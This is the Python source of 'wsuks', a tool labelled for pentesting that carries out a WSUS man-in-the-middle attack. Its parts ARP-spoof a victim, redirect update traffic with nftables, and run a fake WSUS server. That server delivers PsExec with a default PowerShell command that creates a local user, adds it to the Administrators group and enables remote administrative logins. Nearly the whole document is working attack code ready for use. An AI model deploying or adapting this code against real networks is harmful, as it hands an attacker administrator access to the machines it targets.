from ipaddress import ip_address, IPv4Network
import logging
from pathlib import Path
import sys
import time
import traceback
import scapy.all as scapy
from scapy.arch import get_if_addr
import netifaces as ni
from threading import Thread
import os
import signal


class ArpSpoofer:
    """Enable MITM attacks with ARP spoofing."""

    def __init__(self, interface):
        self.logger = logging.getLogger("wsuks")
        self.interface = interface
        self.isRunning = False
        self.targetIp = None
        self.targetMac = None
        self.spoofIp = None
        self.ip_forwarding = None

    def _spoof(self, targetIp, spoofIp):
        """
        Spoof the target's ARP table by sending a fake ARP response with our MAC address as the sender.

        :param targetIp: The victim's IP address
        :param spoofIp: The IP address to spoof
        """
        self.targetMac = scapy.getmacbyip(targetIp)
        self.logger.debug(f"Target IP address: {targetIp}")
        self.logger.debug(f"Target MAC address: {self.targetMac}")
        if self.targetMac is None:
            self.logger.error(f"ARP request for IP address {targetIp} failed! Target is not reachable! Exiting...")
            os.kill(os.getpid(), signal.SIGINT)
        else:
            while self.isRunning:
                self.logger.debug(f"Tell target {targetIp} that spoofed IP address {spoofIp} is at our MAC address")
                packet = scapy.ARP(op="is-at", pdst=targetIp, hwdst=self.targetMac, psrc=spoofIp)
                scapy.send(packet, verbose=False)
                time.sleep(1)

    def _restore(self, targetIp, source_ip):
        """
        Restore the target's ARP table by sending a real ARP response.
        This is done by sending the target the spoofed IP address and the real MAC address of the spoofed IP address.

        :param targetIp: The victim's IP address
        :param source_ip: The spoofed IP address
        """
        try:
            self.logger.info(f"Restoring ARP tables for target {targetIp} and spoofed IP address {source_ip}")
            self.logger.debug(f"Tell target {targetIp} the correct MAC-Adress for spoofed IP address {source_ip}")
            source_mac = scapy.getmacbyip(source_ip)
            packet = scapy.ARP(op="is-at", pdst=targetIp, hwdst=self.targetMac, psrc=source_ip, hwsrc=source_mac)
            scapy.send(packet, verbose=False)
        except Exception as e:
            self.logger.error(f"Error while restoring ARP tables: {e}")
            if self.logger.level == logging.DEBUG:
                traceback.print_exc()

    def get_default_gateway_ip(self, iface):
        """
        Returns the default gateway IP address of the specified Interface

        :param iface: The interface to get the default gateway IP address from
        :return: The default gateway IP address or None
        """
        try:
            return [x[2] for x in scapy.conf.route.routes if x[3] == iface and x[2] != "0.0.0.0"][0]  # noqa: RUF015
        except IndexError:
            self.logger.error(f"No gateway IP found for interface {iface}")
            return None

    def check_spoofIp_subnet(self, targetIp, spoofIp):
        """
        Returns the IP address to spoof.
        If the IP address is not in the same subnet as the host, the gateway IP address is returned.
        If the host is the gateway and the IP address to spoof is not in the same subnet, we exit as we can't spoof ourself.

        :param targetIp: The victim's IP address
        :param spoofIp: The IP address to spoof
        """
        net_mask = ni.ifaddresses(self.interface)[ni.AF_INET][0]["netmask"]
        interface_ip = get_if_addr(self.interface)
        self.subnet = IPv4Network(interface_ip + "/" + net_mask, False)

        self.logger.debug(f"Interface {self.interface} has IP address {interface_ip} and netmask {net_mask}, subnet: {self.subnet}")

        if ip_address(targetIp) not in self.subnet:
            self.logger.critical(f"Target IP address {targetIp} is not in the same subnet as the host! Forgot -I? Exiting...")
            sys.exit(1)
        elif ip_address(spoofIp) not in self.subnet:
            gateway = self.get_default_gateway_ip(self.interface)
            if not gateway:
                self.logger.critical(f"WSUS IP address {spoofIp} is not in the same subnet and {self.interface} has no gateway!")
                self.logger.critical("Can't arp spoof the WSUS IP address! Exiting...")
                sys.exit(1)
            else:
                self.logger.warning(f"WSUS IP address {spoofIp} is not in the same subnet as the host! Spoofing now the gateway IP address: {gateway}")
                return gateway
        else:
            return spoofIp

    def enable_ip_forwarding(self):
        """Enable IP forwarding if the the spoofed IP address is not in the same subnet as the host."""
        # Read ip_fowarding setting and enable it if necessary
        self.ip_forwarding = Path("/proc/sys/net/ipv4/ip_forward").read_text().strip()

        if self.ip_forwarding == "0":
            self.logger.warning("IP fowarding not enabled, enabling now")
            Path("/proc/sys/net/ipv4/ip_forward").write_text("1")

    def disable_ip_forwarding(self):
        """Disable IP forwarding if it was enabled before."""
        if self.ip_forwarding == "0":
            self.logger.warning("Restoring: Disabling IP fowarding")
            Path("/proc/sys/net/ipv4/ip_forward").write_text("0")

    def start(self, targetIp, spoofIp):
        """
        Start the ARP spoofing process.

        :param targetIp: The victim's IP address
        :param spoofIp: The IP address to spoof
        """
        self.targetIp = targetIp
        self.spoofIp = self.check_spoofIp_subnet(targetIp, spoofIp)
        self.isRunning = True

        # If we arp spoof the router enable IP forwarding, so that the target still has network access.
        if ip_address(spoofIp) not in self.subnet:
            self.enable_ip_forwarding()

        self.logger.info(f"Starting ARP spoofing for target {self.targetIp} and spoofing IP address {self.spoofIp}")
        t1 = Thread(target=self._spoof, args=(self.targetIp, self.spoofIp))
        t1.start()

    def stop(self):
        """Stop the ARP spoofing process."""
        if self.isRunning and self.targetIp and self.spoofIp:
            self.logger.info(f"Stopping ARP spoofing for target {self.targetIp}")
            self.isRunning = False
            self._restore(self.targetIp, self.spoofIp)

            # Restore IP forwarding if it was enabled before
            self.disable_ip_forwarding()
        else:
            self.logger.error("ARP spoofing is not running")



from functools import partial
from http.server import HTTPServer
import logging
import os
from pprint import pformat
import random
from string import digits, ascii_letters
import sys
from scapy.all import get_if_addr
import wsuks
from wsuks.lib.arpspoofer import ArpSpoofer
from wsuks.lib.logger import initLogger
from wsuks.lib.argparser import initParser, printBanner
from wsuks.lib.sysvolparser import SysvolParser
from wsuks.lib.wsusserver import WSUSUpdateHandler, WSUSBaseServer
from wsuks.lib.router import Router
from termcolor import colored
import ssl
from ipaddress import ip_address
import socket


class Wsuks:
    def __init__(self, args):
        self.args = args
        self.logger = logging.getLogger("wsuks")

        self.interface = args.interface
        try:
            self.hostIp = get_if_addr(self.interface)
        except ValueError:
            self.logger.error(f"Interface '{args.interface}' not found! Exiting...")
            exit(1)
        self.local_username = "user" + "".join(random.choice(digits) for i in range(5))
        self.local_password = "".join(random.sample(ascii_letters + digits, 12)) + "1!"

        # Set args
        self.targetIp = args.targetIp  # Never None (required)
        self.executable_file = args.executable.read()
        self.executable_name = os.path.basename(args.executable.name)
        args.executable.close()

        # Check if supplied WSUS Server is an IP or DNS name and resolve it
        self.wsusHost = args.wsusHost
        if self.wsusHost:
            try:
                self.wsusIp = str(ip_address(self.wsusHost))
            except ValueError:
                self.logger.debug(f"Host '{self.wsusHost}' is not an IP Address, trying to resolve host.")
                try:
                    self.wsusIp = socket.gethostbyname(self.wsusHost)
                except socket.gaierror:
                    self.logger.error(f"Error: Could not resolve host '{self.wsusHost}'. Exiting...")
                    exit(1)
        else:
            self.wsusIp = None
        if args.wsusPort:
            self.wsusPort = args.wsusPort
        elif args.tlsCert:
            self.wsusPort = 8531  # Default port for HTTPS WSUS Server
        else:
            self.wsusPort = 8530  # Default port for HTTP WSUS Server

        # Automatic mode variables
        self.domain_username = args.username
        self.domain_password = args.password
        self.domain = args.domain
        self.dcIp = args.dcIp
        self.kerberos = args.kerberos
        self.dcName = args.dcName

        # Set Command
        if "CREATE_USER_COMMAND" not in args.command:
            self.command = args.command
        else:
            # Case we add the domain user to the local admin group
            if args.username and args.domain:
                self.logger.success(f"Using domain user for the WSUS attack: User={highlight(args.username, 'green')} Password={highlight(args.password, 'green')} Domain={highlight(args.domain, 'green')}")
                self.command = str(args.command).format(CREATE_USER_COMMAND="", WSUKS_USER=args.domain + "\\" + args.username)
            # Case we generate a local user, add him to the local admin group and make sure LocalAccountTokenFilterPolicy is set to 1
            else:
                with open(os.path.join(os.path.dirname(wsuks.__file__), "executables/Enable-LocalAccountTokenFilterPolicy.ps1")) as file:
                    ps_script = ""
                    for line in file:
                        if line.startswith("#"):
                            continue
                        else:
                            ps_script += line
                self.logger.success(f"Generated local user for the WSUS attack: Username={highlight(self.local_username, 'green')} Password={highlight(self.local_password, 'green')}")
                create_user = f"New-LocalUser -Name {self.local_username} -Password $(ConvertTo-SecureString {self.local_password} -AsPlainText -Force) -Description $(\n{ps_script});\n"
                self.command = str(args.command).format(CREATE_USER_COMMAND=create_user, WSUKS_USER=self.local_username)
                self.logger.warning("WARNING: LocalAccountTokenFilterPolicy will be to 1 to allow remote administrative connections with local accounts. See README for details.")
        self.logger.success(f"Command to execute: \n{highlight(self.executable_name, 'yellow')} {highlight(self.command, 'yellow')}")

    def run(self):
        # Get the WSUS server IP and Port from the sysvol share
        sysvolparser = SysvolParser()
        if not self.wsusIp:
            self.logger.info("WSUS Server not specified, trying to find it in SYSVOL share on DC")
            self.wsusIp, self.wsusPort = sysvolparser.findWsusServer(self.domain, self.domain_username, self.domain_password, self.dcIp, self.kerberos, self.dcName)
        else:
            self.logger.info(f"WSUS Server specified manually: {self.wsusIp}:{self.wsusPort}")

        if self.args.only_discover:
            self.logger.info("Discovered WSUS Server, Exiting...")
            return

        # Should only happen when crawling SYSVOL share
        if not self.wsusIp or not self.wsusPort:
            self.logger.error("Error: WSUS-Server-IP not set. Try to specify the WSUS Server manually with --WSUS-Server and --WSUS-Port. Exiting...")
            sys.exit(1)
        else:
            self.wsusPort = int(self.wsusPort)

        self.logger.info("===== Setup done, starting services =====")
        # Start Arp Spoofing
        arpspoofer = ArpSpoofer(self.interface)
        arpspoofer.start(self.targetIp, self.wsusIp)

        # Set up routing to route spoofed packages to the local HTTP server
        router = Router(self.targetIp, self.hostIp, self.wsusIp, self.wsusPort, self.interface)
        router.start()

        # Prepare WSUS HTTP Server
        # If we have a TLS cert we have to switch to HTTPS and supply the DNS name
        if self.args.tlsCert:  # noqa: SIM108
            update_handler = WSUSUpdateHandler(self.executable_file, self.executable_name, f"https://{self.wsusHost}:{self.wsusPort}")
        else:
            update_handler = WSUSUpdateHandler(self.executable_file, self.executable_name, f"http://{self.hostIp}:{self.wsusPort}")
        update_handler.set_resources_xml(self.command)
        self.logger.debug(update_handler)

        http_handler = partial(WSUSBaseServer, update_handler)
        http_server = HTTPServer((self.hostIp, self.wsusPort), http_handler)

        # Add certificates for HTTPS
        if self.args.tlsCert:
            if not os.path.isfile(self.args.tlsCert):
                self.logger.error(f"TLS certificate file '{self.args.tlsCert}' not found! Exiting...")
                exit(1)
            self.logger.info(f"Using TLS certificate '{self.args.tlsCert}' for HTTPS WSUS Server")
            context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
            context.load_cert_chain(certfile=self.args.tlsCert)
            context.check_hostname = False
            http_server.socket = context.wrap_socket(http_server.socket, server_side=True)

        try:
            self.logger.info(f"Starting WSUS Server on {self.hostIp}:{self.wsusPort}...")
            self.logger.info(f"Serving executable as KB: {update_handler.kb_number}")
            http_server.serve_forever()
        except KeyboardInterrupt:
            print()
            self.logger.info("===== Stopping Services =====")
            self.logger.info("Stopping WSUS Server...")
        finally:
            arpspoofer.stop()
            router.stop()


def highlight(text, color):
    return colored(text, color, attrs=["bold"])


def main():
    # Setup
    printBanner()
    args = initParser()

    logger = initLogger(ts=args.timestamp, debug=args.debug)
    logger.debug("Passed args:\n" + pformat(vars(args)))

    # Prevent scapy from logging to console
    logging.getLogger("scapy").disabled = True
    logging.getLogger("scapy.runtime").disabled = True

    if os.geteuid() != 0:
        logger.error("This script must be run as root!")
        exit(1)

    wsuks = Wsuks(args)
    wsuks.run()


if __name__ == "__main__":
    main()



import argparse
from argparse import RawTextHelpFormatter
import importlib.metadata
import wsuks
from os.path import dirname
from termcolor import colored

__version__ = importlib.metadata.version("wsuks")


def printBanner():
    print(fr"""
    __          __ _____  _    _  _  __  _____
    \ \        / // ____|| |  | || |/ / / ____|
     \ \  /\  / /| (___  | |  | || ' / | (___
      \ \/  \/ /  \___ \ | |  | ||  <   \___ \
       \  /\  /   ____) || |__| || . \  ____) |
        \/  \/   |_____/  \____/ |_|\_\|_____/

     Pentesting Tool for the WSUS MITM Attack
               Made by NeffIsBack
                 {colored('version', 'red', attrs=['bold'])}: {colored(__version__, 'yellow', attrs=['bold'])}
""")


def initParser():
    example_text = """Examples:
    wsuks -t 192.168.0.10 --WSUS-Server 192.168.0.2                                   # Generates a new user&password and adds it to the local admin group
    wsuks -t 192.168.0.10 --WSUS-Server 192.168.0.2 -u User -d Domain.local           # Adds the domain user to the local admin group
    wsuks -t 192.168.0.10 -u User -p Password123 -d Domain.local -dc-ip 192.168.0.1   # Turns on WSUS server discovery and adds the domain user to the local admin group
    """
    parser = argparse.ArgumentParser(prog="wsuks", epilog=example_text, formatter_class=RawTextHelpFormatter)

    parser.add_argument("-v", "--version", action="version", version="Current Version: %(prog)s 2.0")
    parser.add_argument("--debug", action="store_true", help="Enable debug output")
    parser.add_argument("-ts", "--timestamp", action="store_true", help="Add timestamp to log messages")

    parser.add_argument("-t", "--target-ip", metavar="", dest="targetIp", help="IP Address of the victim Client. (REQUIRED)", required="--only-discover" not in parser.parse_known_args()[1])
    parser.add_argument("-I", "--interface", metavar="", help="Network Interface to use. (DEFAULT: %(default)s)", default="eth0")
    parser.add_argument("-e", "--executable", metavar="", default=f"{dirname(wsuks.__file__)}/executables/PsExec64.exe", type=argparse.FileType("rb"), help="The executable to returned to the victim. It has to be signed by Microsoft (DEFAULT: %(default)s)")
    parser.add_argument("-c", "--command", metavar="", default='/accepteula /s powershell.exe "{CREATE_USER_COMMAND}Add-LocalGroupMember -Group $(Get-LocalGroup -SID S-1-5-32-544 | Select Name) -Member {WSUKS_USER};"', help="The command to execute on the victim. \n(DEFAULT (details see README): %(default)s)",)

    simple = parser.add_argument_group("AUTOMATIC MODE", "Discover the WSUS Server automatically by searching for GPOs in SYSVOL. (Default)")
    simple.add_argument("-u", "--username", metavar="", help="Username to authenticate with")
    simple.add_argument("-p", "--password", metavar="", help="Password to authenticate with")
    simple.add_argument("--dc-ip", metavar="", dest="dcIp", help="IP Address of the domain controller")
    simple.add_argument("-d", "--domain", metavar="", help="Domain to authenticate with")
    simple.add_argument("-k", "--kerberos", action="store_true", help="Use Kerberos authentication instead of NTLM")
    simple.add_argument("--dc-name", metavar="", dest="dcName", help="Domain Controller Name to authenticate with, required for Kerberos authentication", required=parser.parse_known_args()[0].kerberos)
    simple.add_argument("--only-discover", action="store_true", help="Only discover the WSUS Server and exit")

    advanced = parser.add_argument_group("MANUAL MODE", "If you know the WSUS Server, you can use this mode to skip the automatic discovery.")
    advanced.add_argument("--WSUS-Server", metavar="", dest="wsusHost", help="IP or DNS name of the WSUS Server.")
    advanced.add_argument("--WSUS-Port", metavar="", dest="wsusPort", type=int, help="Port of the WSUS Server. (DEFAULT: 8530 for HTTP, 8531 for HTTPS)")
    advanced.add_argument("--tls-cert", metavar="", dest="tlsCert", help="Path to a TLS certificate that is valid for the WSUS Server. Turns on HTTPS mode.")

    return parser.parse_args()



from http.server import BaseHTTPRequestHandler
import logging
import traceback
from bs4 import BeautifulSoup
from random import randint
import uuid
import html
import datetime
import base64
import hashlib
import sys
import os
import wsuks


class WSUSUpdateHandler:
    """
    Handling incoming HTTP requests for WSUS server.
    Mostly inspired by https://github.com/GoSecure/pywsus
    """

    def __init__(self, executable_file, executable_name, client_location):
        self.logger = logging.getLogger("wsuks")

        self.get_config_xml = ""
        self.get_cookie_xml = ""
        self.register_computer_xml = ""
        self.sync_updates_xml = ""
        self.get_extended_update_info_xml = ""
        self.report_event_batch_xml = ""
        self.get_authorization_cookie_xml = ""

        self.revision_ids = [randint(900000, 999999), randint(900000, 999999)]
        self.deployment_ids = [randint(80000, 99999), randint(80000, 99999)]
        self.uuids = [uuid.uuid4(), uuid.uuid4()]
        self.kb_number = randint(1000000, 9999999)

        self.executable = executable_file
        self.executable_name = executable_name
        self.command = ""
        self.sha1 = ""
        self.sha256 = ""

        self.client_location = client_location

        self.set_filedigest()

    def get_last_change(self):
        return (datetime.datetime.now() - datetime.timedelta(days=3)).isoformat()

    def get_cookie(self):
        return base64.b64encode(b"A" * 47).decode("utf-8")

    def get_expire(self):
        return (datetime.datetime.now() + datetime.timedelta(minutes=10)).isoformat()

    def set_resources_xml(self, command):
        self.command = command
        # init resources

        path = os.path.abspath(os.path.dirname(wsuks.__file__))

        try:
            with open(f"{path}/xml_files/get-config.xml") as file:
                self.get_config_xml = file.read().format(lastChange=self.get_last_change())
                file.close()

            with open(f"{path}/xml_files/get-cookie.xml") as file:
                self.get_cookie_xml = file.read().format(expire=self.get_expire(), cookie=self.get_cookie())
                file.close()

            with open(f"{path}/xml_files/register-computer.xml") as file:
                self.register_computer_xml = file.read()
                file.close()

            with open(f"{path}/xml_files/sync-updates.xml") as file:
                self.sync_updates_xml = file.read().format(revision_id1=self.revision_ids[0],
                                                           revision_id2=self.revision_ids[1],
                                                           deployment_id1=self.deployment_ids[0],
                                                           deployment_id2=self.deployment_ids[1],
                                                           uuid1=self.uuids[0],
                                                           uuid2=self.uuids[1],
                                                           expire=self.get_expire(),
                                                           cookie=self.get_cookie())
                file.close()

            with open(f"{path}/xml_files/get-extended-update-info.xml") as file:
                self.get_extended_update_info_xml = file.read().format(revision_id1=self.revision_ids[0],
                                                                       revision_id2=self.revision_ids[1],
                                                                       kb_number=self.kb_number,
                                                                       sha1=self.sha1,
                                                                       sha256=self.sha256,
                                                                       filename=self.executable_name,
                                                                       file_size=len(self.executable),
                                                                       command=html.escape(html.escape(self.command)),
                                                                       url=f"{self.client_location}/{uuid.uuid4()}/{self.executable_name}")
                file.close()

            with open(f"{path}/xml_files/report-event-batch.xml") as file:
                self.report_event_batch_xml = file.read()
                file.close()

            with open(f"{path}/xml_files/get-authorization-cookie.xml") as file:
                self.get_authorization_cookie_xml = file.read().format(cookie=self.get_cookie())
                file.close()

        except Exception as err:
            self.logger.error(f"Error: {err}")
            if self.logger.level == logging.DEBUG:
                traceback.print_exc()
            sys.exit(1)

    def set_filedigest(self):
        hash1 = hashlib.sha1()
        hash256 = hashlib.sha256()
        try:
            data = self.executable
            hash1.update(data)
            hash256.update(data)
            self.sha1 = base64.b64encode(hash1.digest()).decode()
            self.sha256 = base64.b64encode(hash256.digest()).decode()

        except Exception as err:
            self.logger.error(f"Error in set_filedigest: {err}")
            if self.logger.level == logging.DEBUG:
                traceback.print_exc()
            sys.exit(1)

    def __str__(self):
        return f"The update metadata - uuids: {self.uuids}, revision_ids: {self.revision_ids}, deployment_ids: {self.deployment_ids}, executable: {self.executable_name}, sha1: {self.sha1}, sha256: {self.sha256}, command: {self.command}"


class WSUSBaseServer(BaseHTTPRequestHandler):
    def __init__(self, wsusUpdateHandler, *args, **kwargs):
        self.logger = logging.getLogger("wsuks")
        self.wsusUpdateHandler = wsusUpdateHandler
        super().__init__(*args, **kwargs)

    def _set_response(self, serveEXE=False):
        self.protocol_version = "HTTP/1.1"
        self.send_response(200)
        self.server_version = "Microsoft-IIS/10.0"
        self.send_header("Cache-Control", "private")

        if serveEXE:
            self.send_header("Content-Type", "application/octet-stream")
            self.send_header("Content-Length", len(self.wsusUpdateHandler.executable))
        else:
            self.send_header("Content-type", "text/xml; chartset=utf-8")

        self.send_header("X-AspNet-Version", "4.0.30319")
        self.send_header("X-Powered-By", "ASP.NET")
        self.end_headers()

    def do_HEAD(self):
        self.logger.success(f"Received HEAD request: {self.path}")
        self.logger.debug(f"HEAD request,\nPath: {self.path}\nHeaders:\n{self.headers}\n")

        if self.path.find(".exe"):
            self.logger.success(f"HEAD request for exe: {self.path}")

            self._set_response(True)

    def do_GET(self):
        self.logger.success(f"Received GET request: {self.path}")
        self.logger.debug(f"GET request,\nPath: {self.path}\nHeaders:\n{self.headers}\n")

        if self.path.find(".exe"):
            self.logger.success(f"GET request for exe: {self.path}")

            self._set_response(True)
            self.wfile.write(self.wsusUpdateHandler.executable)

    def do_POST(self):
        content_length = int(self.headers["Content-Length"])
        post_data = self.rfile.read(content_length)

        post_data_xml = BeautifulSoup(post_data, "xml")
        data = None

        soap_action = self.headers["SOAPAction"]

        self.logger.success(f"Received POST request: {self.path}, SOAP Action: {soap_action}")
        self.logger.debug(f"POST Request,\nPath: {self.path}\nHeaders:\n{self.headers}\n\nBody:\n{post_data_xml.encode_contents()}\n")

        if soap_action == '"http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService/GetConfig"':
            # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wusp/b76899b4-ad55-427d-a748-2ecf0829412b
            data = BeautifulSoup(self.wsusUpdateHandler.get_config_xml, "xml")

        elif soap_action == '"http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService/GetCookie"':
            # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wusp/36a5d99a-a3ca-439d-bcc5-7325ff6b91e2
            data = BeautifulSoup(self.wsusUpdateHandler.get_cookie_xml, "xml")

        elif soap_action == '"http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService/RegisterComputer"':
            # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wusp/b0f2a41f-4b96-42a5-b84f-351396293033
            data = BeautifulSoup(self.wsusUpdateHandler.register_computer_xml, "xml")

        elif soap_action == '"http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService/SyncUpdates"':
            # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wusp/6b654980-ae63-4b0d-9fae-2abb516af894
            data = BeautifulSoup(self.wsusUpdateHandler.sync_updates_xml, "xml")

        elif soap_action == '"http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService/GetExtendedUpdateInfo"':
            # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wusp/862adc30-a9be-4ef7-954c-13934d8c1c77
            data = BeautifulSoup(self.wsusUpdateHandler.get_extended_update_info_xml, "xml")

        elif soap_action == '"http://www.microsoft.com/SoftwareDistribution/ReportEventBatch"':
            # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wusp/da9f0561-1e57-4886-ad05-57696ec26a78
            data = BeautifulSoup(self.wsusUpdateHandler.report_event_batch_xml, "xml")

            post_data_report = BeautifulSoup(post_data, "xml")
            self.logger.debug(f"Client Report: {post_data_report.TargetID.text}, {post_data_report.ComputerBrand.text}, {post_data_report.ComputerModel.text}, {post_data_report.ExtendedData.ReplacementStrings.string}.")

        elif soap_action == '"http://www.microsoft.com/SoftwareDistribution/Server/SimpleAuthWebService/GetAuthorizationCookie"':
            # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wusp/44767c55-1e41-4589-aa01-b306e0134744
            data = BeautifulSoup(self.wsusUpdateHandler.get_authorization_cookie_xml, "xml")

        else:
            self.logger.warning(f"SOAP Action not handled: {soap_action}")
            return

        self._set_response()
        self.wfile.write(data.encode_contents())

        if data is not None:
            self.logger.debug(f"POST Response,\nPath: {self.path}\nHeaders:\n{self.headers}\n\nBody:\n{data.encode_contents}\n")
        else:
            self.logger.warning("POST Response without data.")

    def log_message(self, format, *args):  # noqa: A002
        return




import logging
import re
import socket
import sys
import traceback
import contextlib
from impacket.smbconnection import SMBConnection, SessionError
from ipaddress import ip_address
from wsuks.lib.regpol_parser import RegistryPolicy


class SysvolParser:
    def __init__(self):
        self.logger = logging.getLogger("wsuks")
        self.conn = None
        self.share = "SYSVOL"
        self.wsusIp = None
        self.wsusPort = None  # Default 8530

        # Login info
        self.username = ""
        self.password = ""
        self.dcIp = ""
        self.domain = ""

    def _createSMBConnection(self, domain, username, password, dcIp, kerberos=False, dcName="", lmhash="", nthash="", aesKey=""):
        """Create a SMB connection to the target"""
        # SMB Login would be ready for kerberos or NTLM Hashes Authentication if it is needed
        # TODO: Fix remoteName in SMBConnection if this is a bug
        # TODO: Add Kerberos Authentication
        try:
            if kerberos:
                self.conn = SMBConnection(remoteName=dcName, remoteHost=dcIp, sess_port=445)
            else:
                self.conn = SMBConnection(remoteName=dcIp, remoteHost=dcIp, sess_port=445)

            if kerberos is True:
                self.conn.kerberosLogin(username, password, domain, lmhash, nthash, aesKey, dcIp, useCache=False)
            else:
                self.conn.login(username, password, domain, lmhash, nthash)
            if self.conn.isGuestSession() > 0:
                self.logger.debug("GUEST Session Granted")
            else:
                self.logger.debug("USER Session Granted")
            return True
        except Exception as e:
            self.logger.error(f"Error: {e}")
            if self.logger.level == logging.DEBUG:
                traceback.print_exc()
            return False

    def _extractWsusServerSYSVOL(self):
        def output_callback(data):
            self.reg_data += data

        possible_wsus_locations = []

        policies = self.conn.listPath("SYSVOL", f"{self.domain}/Policies/*")
        for policy in policies:
            try:
                self.reg_data = b""
                self.conn.getFile("SYSVOL", f"{self.domain}/Policies/{policy.get_longname()}/Machine/Registry.pol", output_callback)
                reg_pol = RegistryPolicy(self.reg_data).get_policies()
                for pol in reg_pol:
                    if pol["key"] == "Software\\Policies\\Microsoft\\Windows\\WindowsUpdate" and pol["value"] == "WUServer":
                        try:
                            match = re.search(r"^(https?)://(.+):(\d+)$", pol["data"])
                            if match:
                                scheme, host, wsusPort = match.groups()
                                possible_wsus_locations.append({"name": policy.get_shortname(), "scheme": scheme, "host": host, "port": int(wsusPort)})
                        except Exception as e:
                            self.logger.error(f"Could not parse WSUS Policy (error: {e}): {pol}")
            except SessionError as e:
                self.logger.debug(f"Error: {e}")
            except Exception as e:
                self.logger.error(f"Error: {e}")
                if self.logger.level == logging.DEBUG:
                    traceback.print_exc()

        # Check if we found any WSUS Policies
        if not possible_wsus_locations:
            self.logger.error("Error: No WSUS policies found in SYSVOL Share.")
        elif len(possible_wsus_locations) == 1:
            if scheme == "http":
                self.logger.success(f"Found vulnerable WSUS Server using HTTP: {scheme}://{host}:{wsusPort}")
                return host, wsusPort
            elif scheme == "https":
                self.logger.critical(f"Found WSUS Server using HTTPS: {scheme}://{host}:{wsusPort}")
                self.logger.critical("Not vulnerable to WSUS Attack. Exiting...")
                sys.exit(1)
        elif len(possible_wsus_locations) > 1:
            self.logger.warning("Found multiple WSUS Policies, please specify the WSUS Server manually with --WSUS-Server and --WSUS-Port.")
            for policy in possible_wsus_locations:
                self.logger.warning(f"Found WSUS Server Policy '{policy['name']}', target URL: {policy['scheme']}://{policy['host']}:{policy['port']}")

        return None, None

    def findWsusServer(self, domain, username, password, dcIp, kerberos, dcName) -> tuple[str, int]:
        """
        Get the WSUS server IP address from GPOs of the SYSVOL share

        :param domain: Domain name
        :param username: Username
        :param password: Password
        :param dcIp: Domain Controller IP
        :return: WSUS Server IP and Port
        """
        if not username or not password or not dcIp or not domain:
            self.logger.error("Error: Domain Controller IP, Username, Password and Domain are required to search for WSUS Server in SYSVOL Share. Exiting...")
            sys.exit(1)

        self.username = username
        self.password = password
        self.dcIp = dcIp
        self.domain = domain

        try:
            if self._createSMBConnection(domain, username, password, dcIp, kerberos, dcName):
                host, self.wsusPort = self._extractWsusServerSYSVOL()

                # Check if host is an IP Address, if not resolve it
                if host and self.wsusPort:
                    try:
                        self.wsusIp = str(ip_address(host))
                    except ValueError:
                        self.logger.debug(f"Host '{host}' is not an IP Address, trying to resolve host.")
                        try:
                            self.wsusIp = socket.gethostbyname(host)
                        except socket.gaierror:
                            self.logger.error(f"Error: Could not resolve host '{host}'.")
        except Exception as e:
            self.logger.error(f"Error while looking for WSUS Server in SYSVOL Share: {e}")
            if self.logger.level == logging.DEBUG:
                traceback.print_exc()
        finally:
            with contextlib.suppress(Exception):
                self.conn.close()

        return self.wsusIp, self.wsusPort



import logging
from scapy.all import get_if_hwaddr
try:
    from nftables import Nftables
except ImportError:
    logger = logging.getLogger("wsuks")
    logger.error("nftables is not installed. Please install nftables to use the Router class. See installation instructions in the README.md.")
    exit(1)


class Router:
    """Takes care of routing ARP spoofed traffic to the local HTTP server."""

    def __init__(self, targetIp, hostIp, wsusIp, wsusPort, interface):
        self.logger = logging.getLogger("wsuks")
        self.isRunning = False
        self.targetIp = targetIp
        self.hostIp = hostIp
        self.hostMac = get_if_hwaddr(interface)
        self.wsusIp = wsusIp
        self.wsusPort = wsusPort
        self.interface = interface
        self.nft = Nftables()
        self.nft.set_json_output(True)

    def start(self):
        """Configure nftables equivalent to the following rules:

        nft 'add table ip wsuks'
        nft 'add chain ip wsuks wsuks-nat { type nat hook prerouting priority dstnat; policy accept; }'
        nft 'add rule ip wsuks wsuks-nat ip saddr <TARGET-IP> tcp dport <WSUKS-PORT> dnat ip to <HOST-IP>'
        """
        self.isRunning = True
        self.logger.info(f"Configure nftables for NATing incoming packages from {self.targetIp} with destination {self.wsusIp}:{self.wsusPort} to {self.hostIp}")

        self.nft.cmd("add table ip wsuks")
        self.nft.cmd("add chain ip wsuks wsuks-nat { type nat hook prerouting priority dstnat; policy accept; }")
        self.nft.cmd(f"add rule ip wsuks wsuks-nat ip saddr {self.targetIp} tcp dport {self.wsusPort} dnat ip to {self.hostIp}")

    def stop(self):
        """
        Stop the ARP spoofing process by deleting configured nftables table 'wsuks':

        nft flush table ip wsuks
        nft delete table ip wsuks
        """
        if self.isRunning and self.targetIp:
            self.logger.info("Stop routing: Delete 'wsuks' routing table")
            self.nft.cmd("flush table ip wsuks")
            self.nft.cmd("delete table ip wsuks")
            self.isRunning = False
        else:
            self.logger.error("Router is not running")
